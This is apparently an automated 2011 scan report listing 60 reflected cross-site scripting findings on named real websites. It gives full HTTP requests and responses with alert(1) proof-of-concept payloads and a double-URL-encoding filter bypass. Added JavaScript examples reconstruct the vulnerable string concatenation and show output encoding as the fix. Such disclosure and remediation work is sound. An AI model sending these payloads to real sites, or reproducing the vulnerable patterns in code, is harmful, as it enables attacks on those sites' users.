XSS, Reflected Cross Site Scripting, CWE-79, CAPEC-86, DORK, GHDB, BHDB, 10032011-03

Report generated by XSS.CX at Mon Oct 03 15:20:12 CDT 2011.

1. Cross-site scripting (reflected)

1.1. http://display.digitalriver.com/ [aid parameter]

1.2. http://display.digitalriver.com/ [name of an arbitrarily supplied request parameter]

1.3. http://display.digitalriver.com/ [tax parameter]

1.4. http://maplesoft.tt.omtrdc.net/m2/maplesoft/mbox/standard [mbox parameter]

1.5. http://maplesoft.tt.omtrdc.net/m2/maplesoft/sc/standard [mbox parameter]

1.6. http://maplesoft.tt.omtrdc.net/m2/maplesoft/sc/standard [mboxId parameter]

1.7. http://ptc.sharedvue.net/sharedvue/resources/dyn/hit/370965846.gif [REST URL parameter 4]

1.8. http://ptc.sharedvue.net/sharedvue/resources/dyn/tick/370965861.gif [REST URL parameter 4]

1.9. http://ptc.sharedvue.net/sharedvue/resources/dyn/tick/370965876.gif [REST URL parameter 4]

1.10. http://ptc.sharedvue.net/sharedvue/resources/dyn/tick/370965891.gif [REST URL parameter 4]

1.11. http://ptc.sharedvue.net/sharedvue/resources/dyn/tick/370965906.gif [REST URL parameter 4]

1.12. http://ptc.sharedvue.net/sharedvue/resources/dyn/tick/370965921.gif [REST URL parameter 4]

1.13. http://ptc.sharedvue.net/sharedvue/resources/dyn/tick/370965936.gif [REST URL parameter 4]

1.14. http://ptc.sharedvue.net/sharedvue/resources/dyn/tick/370965951.gif [REST URL parameter 4]

1.15. http://ptc.sharedvue.net/sharedvue/resources/dyn/tick/370965966.gif [REST URL parameter 4]

1.16. http://ptc.sharedvue.net/sharedvue/resources/dyn/tick/370965981.gif [REST URL parameter 4]

1.17. http://search.maplesoft.com/search [q parameter]

1.18. http://search.maplesoft.com/search [q parameter]

1.19. http://search.maplesoft.com/search [q parameter]

1.20. http://www.maplesoft.com/products/maple/new_features/index.aspx [p parameter]

1.21. http://www.novedge.com/ [name of an arbitrarily supplied request parameter]

1.22. http://www.novedge.com/products/5082 [REST URL parameter 2]

1.23. http://www.novedge.com/products/5082 [name of an arbitrarily supplied request parameter]

1.24. http://www.nxrev.com/content-0 [name of an arbitrarily supplied request parameter]

1.25. http://www.nxrev.com/content-0 [name of an arbitrarily supplied request parameter]

1.26. http://www.ptc.com/appserver/auth/authenticate.jsp [REST URL parameter 1]

1.27. http://www.ptc.com/appserver/search/results.jsp [REST URL parameter 1]

1.28. http://www.ptc.com/appserver/search/results.jsp [REST URL parameter 1]

1.29. http://www.ptc.com/appserver/search/results.jsp [name of an arbitrarily supplied request parameter]

1.30. http://www.ptc.com/appserver/search/results.jsp [q parameter]

1.31. http://www.ptc.com/appserver/search/results.jsp [q parameter]

1.32. http://www.ptc.com/common/account/index.htm [REST URL parameter 1]

1.33. http://www.ptc.com/common/account/index.htm [REST URL parameter 2]

1.34. http://www.ptc.com/common/account/index.htm [REST URL parameter 3]

1.35. http://www.ptc.com/favicon.ico [REST URL parameter 1]

1.36. http://www.ptc.com/products/mathcad/ [REST URL parameter 1]

1.37. http://www.ptc.com/products/mathcad/ [REST URL parameter 2]

1.38. http://www.ptc.com/services/index.htm [REST URL parameter 1]

1.39. http://www.ptc.com/services/index.htm [REST URL parameter 1]

1.40. http://www.ptc.com/services/index.htm [REST URL parameter 2]

1.41. http://www.ptc.com/services/index.htm [REST URL parameter 2]

1.42. http://www.ptc.com/solutions/index.htm [REST URL parameter 1]

1.43. http://www.ptc.com/solutions/index.htm [REST URL parameter 1]

1.44. http://www.ptc.com/solutions/index.htm [REST URL parameter 2]

1.45. http://www.ptc.com/solutions/index.htm [REST URL parameter 2]

1.46. http://www.ptc.com/solutions/product-lifecycle-management [REST URL parameter 1]

1.47. http://www.ptc.com/solutions/product-lifecycle-management [REST URL parameter 1]

1.48. http://www.ptc.com/solutions/product-lifecycle-management [REST URL parameter 2]

1.49. http://www.ptc.com/solutions/product-lifecycle-management [REST URL parameter 2]

1.50. http://www.ptc.com/solutions/product-lifecycle-management/ [REST URL parameter 1]

1.51. http://www.ptc.com/solutions/product-lifecycle-management/ [REST URL parameter 1]

1.52. http://www.ptc.com/solutions/product-lifecycle-management/ [REST URL parameter 2]

1.53. http://www.ptc.com/solutions/product-lifecycle-management/ [REST URL parameter 2]

1.54. https://www.ptc.com/appserver/common/account/password.jsp [uid parameter]

1.55. https://www.ptc.com/appserver/common/login/ssl/login.jsp [dest parameter]

1.56. https://www.ptc.com/appserver/common/login/ssl/login.jsp [msg parameter]

1.57. https://www.ptc.com/appserver/common/login/ssl/login.jsp [name of an arbitrarily supplied request parameter]

1.58. https://www.ptc.com/appserver/common/login/ssl/login.jsp [uid parameter]

1.59. https://www.ptc.com/appserver/common/login/ssl/login.jsp [uid parameter]

1.60. http://www.wolfram.com/news/mathcad.html [name of an arbitrarily supplied request parameter]



1. Cross-site scripting (reflected)
There are 60 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Remediation background

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences: input should be validated as strictly as possible on arrival, given the kind of content it is expected to contain (a numeric identifier should be checked to be an integer, for example); and user input should be encoded for the context it is copied into at the point of output, which for HTML content means replacing the metacharacters < > " ' and = with their HTML entities, and for a JavaScript string means emitting a properly escaped string literal. In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


1.1. http://display.digitalriver.com/ [aid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://display.digitalriver.com
Path:   /

Issue detail

The value of the aid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ee7e8'-alert(1)-'c7efbc052f0 was submitted in the aid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response: the single quote closes the string literal and the -alert(1)- arithmetic runs when the script is evaluated. One caveat on exploitability: although the response is labelled text/html, its body is a loader script built to be fetched through a script element by another page (the Referer header indicates the request originated from a page on www.journeyed.com, which supplies its own aid and tax values). A browser navigated to this URL directly displays the script as text, so the injected code executes only in a page that loads the URL with attacker-controlled parameters; the report does not show such a page.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
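How the break-out in this issue actually works, and how to emit the value safely, as an added example that is not part of the scan report or of Digital River's code. The two builder functions are hypothetical stand-ins for the server-side code that produced the response above (only its output is visible in the report); the payload and the loader shape are taken from the request and response shown. The stub DOM lets the generated loader run under Node so that the alert is observed rather than assumed.

```javascript
// Added example; not from the scan report. The builders below are hypothetical
// reconstructions of the server-side code behind display.digitalriver.com/?aid=...&tax=...;
// only its output appears in the report.

// Payload exactly as submitted in the aid parameter in issue 1.1.
const PAYLOAD = "244ee7e8'-alert(1)-'c7efbc052f0";

// Vulnerable builder: values are concatenated straight into a single-quoted
// JavaScript string, which is what the reflected response shows.
function buildLoaderVulnerable(aid, tax) {
  return "var dgt_script = document.createElement('SCRIPT');\n" +
    "dgt_script.src = document.location.protocol + '//digr.netmng.com/?aid=" +
    aid + "&tax=" + tax + "';\n" +
    "document.getElementsByTagName('head')[0].appendChild(dgt_script);\n";
}

// JavaScript string-literal encoder: JSON.stringify handles quotes, backslashes
// and control characters; the extra replacements cover what it leaves raw but
// which still matter inside an inline <script> block or a script resource.
function jsStringLiteral(value) {
  return JSON.stringify(String(value))
    .replace(/</g, "\\u003c")        // neutralises </script> and <!--
    .replace(/\u2028/g, "\\u2028")   // line terminators that JSON allows raw but
    .replace(/\u2029/g, "\\u2029");  // older JS engines reject inside a literal
}

// Hardened builder: the query string is URL-encoded (so a value cannot add
// parameters) and then emitted as a proper JavaScript string literal.
function buildLoaderHardened(aid, tax) {
  const qs = "aid=" + encodeURIComponent(aid) + "&tax=" + encodeURIComponent(tax);
  return "var dgt_script = document.createElement('SCRIPT');\n" +
    "dgt_script.src = document.location.protocol + '//digr.netmng.com/?' + " +
    jsStringLiteral(qs) + ";\n" +
    "document.getElementsByTagName('head')[0].appendChild(dgt_script);\n";
}

// Executes a generated loader against a minimal stub DOM and records whether
// alert() fired and what src the created script element ended up with.
function runLoader(code) {
  const result = { alerts: [], src: undefined };
  const scriptEl = {};
  const stubDocument = {
    location: { protocol: "http:" },
    createElement: () => scriptEl,
    getElementsByTagName: () => [{ appendChild: () => {} }],
  };
  const stubAlert = (x) => { result.alerts.push(x); };
  // The loader only references the free names document and alert.
  new Function("document", "alert", code)(stubDocument, stubAlert);
  result.src = scriptEl.src;
  return result;
}

function demo() {
  const vuln = runLoader(buildLoaderVulnerable(PAYLOAD, "jrny"));
  const safe = runLoader(buildLoaderHardened(PAYLOAD, "jrny"));
  return { vulnAlerts: vuln.alerts, vulnSrc: vuln.src, safeAlerts: safe.alerts, safeSrc: safe.src };
}

console.log(demo());
```

In the vulnerable run the string arithmetic evaluates to NaN and alert(1) fires; in the hardened run the same payload is carried inertly inside the src URL. The encoder does not strip anything, so legitimate single quotes in a value survive.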

Request

GET /?aid=244ee7e8'-alert(1)-'c7efbc052f0&tax=jrny HTTP/1.1
Host: display.digitalriver.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.journeyed.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: op393dr_homepage_demogum=a04006j09d2794r06b26c1afe; __utma=94877326.899275530.1315145846.1315145846.1315145846.1; __utmz=94877326.1315145846.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); op393dr_homepage_demo1gum=a04e07i0a12794q0643tzd2794r06b2ml33d0

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 20:02:13 GMT
Server: Apache/2.2.9
Expires: Mon, 03 Oct 2011 20:32:13 GMT
Last-Modified: Mon, 03 Oct 2011 20:02:13 GMT
Content-Length: 230
Connection: close
Content-Type: text/html

var dgt_script = document.createElement('SCRIPT');
dgt_script.src = document.location.protocol + '//digr.netmng.com/?aid=244ee7e8'-alert(1)-'c7efbc052f0&tax=jrny';
document.getElementsByTagName('head')[0].appendChild(dgt_script);

1.2. http://display.digitalriver.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://display.digitalriver.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload aca66'-alert(1)-'9386163b3ed was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?aid=244&tax=jrny&aca66'-alert(1)-'9386163b3ed=1 HTTP/1.1
Host: display.digitalriver.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.journeyed.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: op393dr_homepage_demogum=a04006j09d2794r06b26c1afe; __utma=94877326.899275530.1315145846.1315145846.1315145846.1; __utmz=94877326.1315145846.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); op393dr_homepage_demo1gum=a04e07i0a12794q0643tzd2794r06b2ml33d0

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 20:02:14 GMT
Server: Apache/2.2.9
Expires: Mon, 03 Oct 2011 20:32:14 GMT
Last-Modified: Mon, 03 Oct 2011 20:02:14 GMT
Content-Length: 233
Connection: close
Content-Type: text/html

var dgt_script = document.createElement('SCRIPT');
dgt_script.src = document.location.protocol + '//digr.netmng.com/?aid=244&tax=jrny&aca66'-alert(1)-'9386163b3ed=1';
document.getElementsByTagName('head')[0].appendChild(dgt_script);

1.3. http://display.digitalriver.com/ [tax parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://display.digitalriver.com
Path:   /

Issue detail

The value of the tax request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4f87e'-alert(1)-'b68a4c7359b was submitted in the tax parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?aid=244&tax=jrny4f87e'-alert(1)-'b68a4c7359b HTTP/1.1
Host: display.digitalriver.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.journeyed.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: op393dr_homepage_demogum=a04006j09d2794r06b26c1afe; __utma=94877326.899275530.1315145846.1315145846.1315145846.1; __utmz=94877326.1315145846.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); op393dr_homepage_demo1gum=a04e07i0a12794q0643tzd2794r06b2ml33d0

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 20:02:14 GMT
Server: Apache/2.2.9
Expires: Mon, 03 Oct 2011 20:32:14 GMT
Last-Modified: Mon, 03 Oct 2011 20:02:14 GMT
Content-Length: 230
Connection: close
Content-Type: text/html

var dgt_script = document.createElement('SCRIPT');
dgt_script.src = document.location.protocol + '//digr.netmng.com/?aid=244&tax=jrny4f87e'-alert(1)-'b68a4c7359b';
document.getElementsByTagName('head')[0].appendChild(dgt_script);

1.4. http://maplesoft.tt.omtrdc.net/m2/maplesoft/mbox/standard [mbox parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://maplesoft.tt.omtrdc.net
Path:   /m2/maplesoft/mbox/standard

Issue detail

The value of the mbox request parameter is copied into a single-quoted JavaScript string literal in a response served with Content-Type: text/javascript (the scanner classes this as plain text between tags, but the body is a script, not an HTML document). The payload 674fa<script>alert(1)</script>6f4b3b09bb7 was submitted in the mbox parameter. This input was echoed unmodified in the application's response.

This proof-of-concept demonstrates that the parameter is reflected without any encoding. Because the response is a JavaScript resource rather than an HTML page, the injected tags would not execute when a page loads this URL through a script element, and a browser navigated to it directly renders it as text. Turning the reflection into script execution would need a payload that breaks out of the single-quoted string, as in issues 1.1 to 1.3, together with a page that loads this resource with attacker-controlled parameters; the report tests neither. Whatever the eventual context, the value should be emitted as an escaped JavaScript string literal rather than concatenated into the script.

Request

GET /m2/maplesoft/mbox/standard?mboxHost=www.maplesoft.com&mboxSession=1317672433761-966952&mboxPage=1317672433761-966952&screenHeight=1200&screenWidth=1920&browserWidth=1074&browserHeight=906&browserTimeOffset=-300&colorDepth=16&mboxXDomain=enabled&mboxCount=1&mbox=Step-GlobalMaplesoftcom674fa<script>alert(1)</script>6f4b3b09bb7&mboxId=0&mboxTime=1317654434048&mboxURL=http%3A%2F%2Fwww.maplesoft.com%2F&mboxReferrer=&mboxVersion=40 HTTP/1.1
Host: maplesoft.tt.omtrdc.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.maplesoft.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi_holtihx7Bhabx7Dhx7F=[CS]v4|2730A37085079998-400001008005E291|4E6146E0[CE]

Response

HTTP/1.1 200 OK
P3P: CP="NOI DSP CURa OUR STP COM"
Set-Cookie: mboxPC=1317672433761-966952.19; Domain=maplesoft.tt.omtrdc.net; Expires=Wed, 02-Nov-2011 20:08:01 GMT; Path=/m2/maplesoft
Content-Type: text/javascript
Content-Length: 219
Date: Mon, 03 Oct 2011 20:08:00 GMT
Server: Test & Target

mboxFactories.get('default').get('Step-GlobalMaplesoftcom674fa<script>alert(1)</script>6f4b3b09bb7',0).setOffer(new mboxOfferDefault()).loaded();mboxFactories.get('default').getPCId().forceId("1317672433761-966952.19");

1.5. http://maplesoft.tt.omtrdc.net/m2/maplesoft/sc/standard [mbox parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://maplesoft.tt.omtrdc.net
Path:   /m2/maplesoft/sc/standard

Issue detail

The value of the mbox request parameter is copied into a single-quoted JavaScript string literal in a response that carries no Content-Type header, so its interpretation is left to the browser's content sniffing; the body is a script, not an HTML document. The payload a5dfc<img%20src%3da%20onerror%3dalert(1)>2e3bb5bed67 was submitted in the mbox parameter. This input was echoed as a5dfc<img src=a onerror=alert(1)>2e3bb5bed67 in the application's response: the URL encoding was decoded once, as expected, and nothing was filtered.

This proof-of-concept demonstrates that the parameter is reflected without any encoding; the payload uses an event handler rather than a script tag so that it would also fire where script tags alone are filtered. The same caveat as for issue 1.4 applies: inside a JavaScript string literal the injected markup is inert, and execution would require breaking out of the string, which the report does not test.

Request

GET /m2/maplesoft/sc/standard?mboxHost=www.maplesoft.com&mboxSession=1317672433761-966952&mboxPage=1317672433761-966952&screenHeight=1200&screenWidth=1920&browserWidth=1074&browserHeight=906&browserTimeOffset=-300&colorDepth=16&mboxXDomain=enabled&mboxCount=2&mbox=SiteCatalyst%3A%20eventa5dfc<img%20src%3da%20onerror%3dalert(1)>2e3bb5bed67&mboxId=0&mboxTime=1317654435241&charSet=ISO-8859-1&visitorNamespace=maplesoft&pageName=Home%20Page&server=North%20America&resolution=1920x1200&javascriptVersion=1.6&javaEnabled=Y&cookiesEnabled=Y&trackDownloadLinks=true&trackExternalLinks=true&trackInlineStats=true&linkLeaveQueryString=false&linkDownloadFileTypes=exe%2Czip%2Cwav%2Cmp3%2Cmov%2Cmpg%2Cavi%2Cmp4%2Cwmv%2Cdoc%2Cpdf%2Cxls%2Cmw%2Cmws%2Cmsim&linkInternalFilters=javascript%3A%2Cmaplesoft.com%2Cmapleprimes.com%2Cmaplesoft.ch%2Cmaplesoft.fr%2Caustralia.maplesoft.com%2Cmapleoracles.maplesoft.com%2Cwebstore.maplesoft.com&linkTrackVars=None&linkTrackEvents=None&prop3=english&prop13=Non-Member&eVar13=Non-Member&mboxURL=http%3A%2F%2Fwww.maplesoft.com%2F&mboxReferrer=&mboxVersion=40&scPluginVersion=1 HTTP/1.1
Host: maplesoft.tt.omtrdc.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.maplesoft.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi_holtihx7Bhabx7Dhx7F=[CS]v4|2730A37085079998-400001008005E291|4E6146E0[CE]

Response

HTTP/1.1 200 OK
P3P: CP="NOI DSP CURa OUR STP COM"
Set-Cookie: mboxPC=1317672433761-966952.19; Domain=maplesoft.tt.omtrdc.net; Expires=Wed, 02-Nov-2011 20:08:56 GMT; Path=/m2/maplesoft
Content-Length: 264
Date: Mon, 03 Oct 2011 20:08:56 GMT
Server: Test & Target

if (typeof(mboxFactories) !== 'undefined') {mboxFactories.get('default').getPCId().forceId("1317672433761-966952.19");mboxFactories.get('default').get('SiteCatalyst: eventa5dfc<img src=a onerror=alert(1)>2e3bb5bed67', 0).setOffer(new mboxOfferDefault()).loaded();}

1.6. http://maplesoft.tt.omtrdc.net/m2/maplesoft/sc/standard [mboxId parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://maplesoft.tt.omtrdc.net
Path:   /m2/maplesoft/sc/standard

Issue detail

The value of the mboxId request parameter is copied into a JavaScript expression without any quoting: it becomes the second argument of mboxFactories.get('default').get(...), where a numeric identifier is expected. The response carries no Content-Type header. The payload 898f4<script>alert(1)</script>81a6228c395 was submitted in the mboxId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept demonstrates that the parameter is reflected without encoding or validation. Unlike the mbox parameter (issues 1.4 and 1.5), this value is not even delimited by quotes, so whatever is written here becomes part of the script's syntax when the resource is executed; the HTML payload shown merely produces a syntax error in that position. The parameter is a numeric identifier and should be validated as an integer before it is echoed. The report does not test a payload tailored to this unquoted context.

Request

GET /m2/maplesoft/sc/standard?mboxHost=www.maplesoft.com&mboxSession=1317672433761-966952&mboxPage=1317672433761-966952&screenHeight=1200&screenWidth=1920&browserWidth=1074&browserHeight=906&browserTimeOffset=-300&colorDepth=16&mboxXDomain=enabled&mboxCount=2&mbox=SiteCatalyst%3A%20event&mboxId=0898f4<script>alert(1)</script>81a6228c395&mboxTime=1317654435241&charSet=ISO-8859-1&visitorNamespace=maplesoft&pageName=Home%20Page&server=North%20America&resolution=1920x1200&javascriptVersion=1.6&javaEnabled=Y&cookiesEnabled=Y&trackDownloadLinks=true&trackExternalLinks=true&trackInlineStats=true&linkLeaveQueryString=false&linkDownloadFileTypes=exe%2Czip%2Cwav%2Cmp3%2Cmov%2Cmpg%2Cavi%2Cmp4%2Cwmv%2Cdoc%2Cpdf%2Cxls%2Cmw%2Cmws%2Cmsim&linkInternalFilters=javascript%3A%2Cmaplesoft.com%2Cmapleprimes.com%2Cmaplesoft.ch%2Cmaplesoft.fr%2Caustralia.maplesoft.com%2Cmapleoracles.maplesoft.com%2Cwebstore.maplesoft.com&linkTrackVars=None&linkTrackEvents=None&prop3=english&prop13=Non-Member&eVar13=Non-Member&mboxURL=http%3A%2F%2Fwww.maplesoft.com%2F&mboxReferrer=&mboxVersion=40&scPluginVersion=1 HTTP/1.1
Host: maplesoft.tt.omtrdc.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.maplesoft.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi_holtihx7Bhabx7Dhx7F=[CS]v4|2730A37085079998-400001008005E291|4E6146E0[CE]

Response

HTTP/1.1 200 OK
P3P: CP="NOI DSP CURa OUR STP COM"
Set-Cookie: mboxPC=1317672433761-966952.19; Domain=maplesoft.tt.omtrdc.net; Expires=Wed, 02-Nov-2011 20:08:58 GMT; Path=/m2/maplesoft
Content-Length: 261
Date: Mon, 03 Oct 2011 20:08:58 GMT
Server: Test & Target

if (typeof(mboxFactories) !== 'undefined') {mboxFactories.get('default').getPCId().forceId("1317672433761-966952.19");mboxFactories.get('default').get('SiteCatalyst: event', 0898f4<script>alert(1)</script>81a6228c395).setOffer(new mboxOfferDefault()).loaded();}

1.7. http://ptc.sharedvue.net/sharedvue/resources/dyn/hit/370965846.gif [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ptc.sharedvue.net
Path:   /sharedvue/resources/dyn/hit/370965846.gif

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload b05d9%253cscript%253ealert%25281%2529%253c%252fscript%253ef51dd29202e was submitted in the REST URL parameter 4. This input was echoed as b05d9<script>alert(1)</script>f51dd29202e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
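Why the double-encoded payload slips past the application's filter, and the two ways of closing it that the remediation text describes, as an added example that is not part of the scan report or of the sharedvue application. The blocklist, the handler functions and the second decode are hypothetical reconstructions (only the application's output is visible in the report); the path segment is the one the request above arrives with after the web server's single decode. The example covers issues 1.7 to 1.16, which differ only in the hit/tick segment and the payload marker.

```javascript
// Added example; not from the scan report. The filter and handlers are
// hypothetical reconstructions of ptc.sharedvue.net's behaviour; only the
// application's output appears in the report.

// REST URL parameter 4 as the application receives it: the scanner sent
// %253c..., the web server decoded %25 to %, leaving a still-encoded %3c.
const SEGMENT_AFTER_SERVER_DECODE =
  "hitb05d9%3cscript%3ealert%281%29%3c%2fscript%3ef51dd29202e";

// Crude character blocklist of the kind the report says the application uses.
const XSS_BLOCKLIST = /[<>"'()]/;

function redirectHtml(segment) {
  // Shape of the echoed line in the response, with the trailing query dropped.
  return "Redirect to: /sharedvue/" + segment + "/370965846.gif";
}

// Vulnerable order of operations: validate, then URL-decode a second time, then
// echo. The filter sees only %3c and %3e and lets the value through.
function renderVulnerable(segment) {
  if (XSS_BLOCKLIST.test(segment)) return { blocked: true, html: "" };
  const canonical = decodeURIComponent(segment); // the second, unnecessary decode
  return { blocked: false, html: redirectHtml(canonical) };
}

// Fix 1: canonicalise first, validate afterwards, as the remediation text asks.
// Keeps the second decode (if some other code path really needs it) but makes
// the filter see what the browser will see.
function renderValidateAfterDecode(segment) {
  const canonical = decodeURIComponent(segment);
  if (XSS_BLOCKLIST.test(canonical)) return { blocked: true, html: "" };
  return { blocked: false, html: redirectHtml(canonical) };
}

// Fix 2: drop the second decode and HTML-encode on output. Output encoding does
// not depend on guessing which characters an attacker needs, so it holds even
// when the blocklist is incomplete.
function htmlEncode(text) {
  return String(text).replace(/[&<>"'=]/g, (c) => "&#" + c.charCodeAt(0) + ";");
}
function renderEncoded(segment) {
  return { blocked: false, html: redirectHtml(htmlEncode(segment)) };
}

function demo() {
  return {
    vulnerable: renderVulnerable(SEGMENT_AFTER_SERVER_DECODE),
    singleEncodedAgainstVulnerable: renderVulnerable("hit<script>alert(1)</script>"),
    validateAfterDecode: renderValidateAfterDecode(SEGMENT_AFTER_SERVER_DECODE),
    encoded: renderEncoded("hit<script>alert(1)</script>"),
  };
}

console.log(demo());
```

The singleEncodedAgainstVulnerable case shows why the filter looked adequate to whoever wrote it: a plain <script> in the path is caught. It is the extra decode after validation that turns %3c back into a live tag.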

Request

GET /sharedvue/resources/dyn/hitb05d9%253cscript%253ealert%25281%2529%253c%252fscript%253ef51dd29202e/370965846.gif?new=true&return=false&pid=3&sid=096549faa6a9d4a0d1169c5c9e9d83ab&prvid=0&stype=server&surl=http%3A//www.nxrev.com/content-0%3Fq%3Dnode/179 HTTP/1.1
Host: ptc.sharedvue.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.nxrev.com/content-0
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDCCBDACQD=EOGKPBHAJNNBMCFEFKJGBHCC; BIGipServersv0-web-http=899536202.20480.0000

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 490
Content-Type: text/html
Expires: Sun, 02 Oct 2011 20:05:08 GMT
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Mon, 03 Oct 2011 20:05:08 GMT


<strong>/sharedvue/dyn/hitb05d9%3cscript%3ealert%281%29%3c%2fscript%3ef51dd29202e/370965846.gif?new=true&return=false&pid=3&sid=096549faa6a9d4a0d1169c5c9e9d83ab&prvid=0&stype=server&surl=htt
...[SNIP]...
<br />
Redirect to: /sharedvue/hitb05d9<script>alert(1)</script>f51dd29202e/370965846.gif?new=true&return=false&pid=3&sid=096549faa6a9d4a0d1169c5c9e9d83ab&prvid=0&stype=server&surl=http://www.nxrev.com/content-0?q=node/179

1.8. http://ptc.sharedvue.net/sharedvue/resources/dyn/tick/370965861.gif [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ptc.sharedvue.net
Path:   /sharedvue/resources/dyn/tick/370965861.gif

Issue detail

